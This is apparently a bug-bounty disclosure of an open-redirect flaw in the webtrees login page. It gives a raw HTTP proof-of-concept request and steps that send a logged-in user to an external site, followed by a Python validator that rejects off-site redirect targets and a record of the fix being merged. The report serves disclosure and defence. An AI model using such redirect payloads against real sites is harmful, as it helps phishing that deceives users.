Open Redirect in fisharebest/webtrees

Valid

Reported on

Sep 28th 2021


Description

Open redirect at login via the url parameter: the value of url is used as the post-login redirect target without checking that it points back into the application.

Proof of Concept

// PoC.request
POST /demo-stable/index.php?route=%2Fdemo-stable%2Flogin%2Fdemo HTTP/2
Host: dev.webtrees.net
Cookie: __Secure-WT-ID=ekks8678620p55do7do21jd4p1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://dev.webtrees.net/
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
Origin: https://dev.webtrees.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

_csrf=o57ZmYPF0fQhPhLNSs3ICWiKzwnj9wFt&url=https%3A%2F%2Fgoogle.com&username=editor&password=editor

Steps to Reproduce

Open the login page with a url parameter pointing at an external site: https://dev.webtrees.net/demo-stable/index.php?route=%2Fdemo-stable%2Flogin%2Fdemo&url=https://google.com

After a successful login, the application redirects the browser to google.com.

Impact

The redirect is not restricted to relative URLs within the application, so an attacker could leverage it to fool an end user into believing that a malicious URL they were redirected to is a legitimate part of the site.
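The defensive check the report is asking for is to only honour a post-login redirect target that resolves to the application's own origin and base path, and to fall back to a known landing page otherwise. The following is an added example written for this report; it is not webtrees code. It assumes a base URL of https://dev.webtrees.net/demo-stable/ (taken from the host in the PoC) and a made-up fallback landing path, and it also handles the variants a plain "starts with /" check misses (protocol-relative //host, backslash tricks, and non-http schemes):

```python
from urllib.parse import parse_qs, urljoin, urlsplit

# Assumed application base URL (host from the PoC; the path is this example's assumption).
APP_BASE = "https://dev.webtrees.net/demo-stable/"
# Assumed safe landing page used when the requested target is rejected.
DEFAULT_LANDING = "/demo-stable/index.php?route=%2Fdemo-stable%2F"


def is_safe_redirect(url: str, base: str = APP_BASE) -> bool:
    """Return True only if `url` resolves to the same scheme, host and base path as `base`."""
    if not url:
        return False
    # Browsers treat "/\evil.com" like "//evil.com", so normalise backslashes first.
    candidate = url.strip().replace("\\", "/")
    parts = urlsplit(candidate)
    base_parts = urlsplit(base)

    # Any explicit scheme must match the app's (rejects javascript:, data:, http:// downgrade).
    if parts.scheme and parts.scheme.lower() != base_parts.scheme.lower():
        return False
    # Any explicit host must be the app's own (rejects https://google.com and //google.com).
    if parts.netloc and parts.netloc.lower() != base_parts.netloc.lower():
        return False

    # Resolve the (possibly relative) target against the base and re-check the result,
    # which also folds "../" segments so a path cannot climb out of the base path.
    resolved = urlsplit(urljoin(base, candidate))
    if resolved.scheme.lower() != base_parts.scheme.lower():
        return False
    if resolved.netloc.lower() != base_parts.netloc.lower():
        return False
    return resolved.path.startswith(base_parts.path)


def safe_redirect_target(url: str, fallback: str = DEFAULT_LANDING) -> str:
    """Return `url` if it is safe to redirect to, otherwise the fallback landing page."""
    return url if is_safe_redirect(url) else fallback


def redirect_from_form_body(body: str, fallback: str = DEFAULT_LANDING) -> str:
    """Decode a login POST body and pick the redirect target the app should actually use.

    Validation runs on the decoded value, so a percent-encoded external URL such as
    url=https%3A%2F%2Fgoogle.com is still recognised as an external target.
    """
    fields = parse_qs(body, keep_blank_values=True)
    requested = fields.get("url", [""])[0]
    return safe_redirect_target(requested, fallback)


if __name__ == "__main__":
    # Constructed sample body, modelled on the PoC request (CSRF token and credentials are dummies).
    poc_body = "_csrf=DUMMYTOKEN&url=https%3A%2F%2Fgoogle.com&username=editor&password=editor"
    print(redirect_from_form_body(poc_body))  # falls back to DEFAULT_LANDING
    print(safe_redirect_target("/demo-stable/index.php?route=%2Fdemo-stable%2Ftree"))
```

The path-prefix check is deliberately stricter than "same host": a target that resolves to the same host but outside the application's base path is treated as untrusted as well, which is the right default for an application installed under a sub-path.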

We have contacted a member of the fisharebest/webtrees team and are waiting to hear back (a month ago)
Greg Roach validated this vulnerability a month ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Greg Roach confirmed that a fix has been merged on 551ad4 a month ago
Greg Roach has been awarded the fix bounty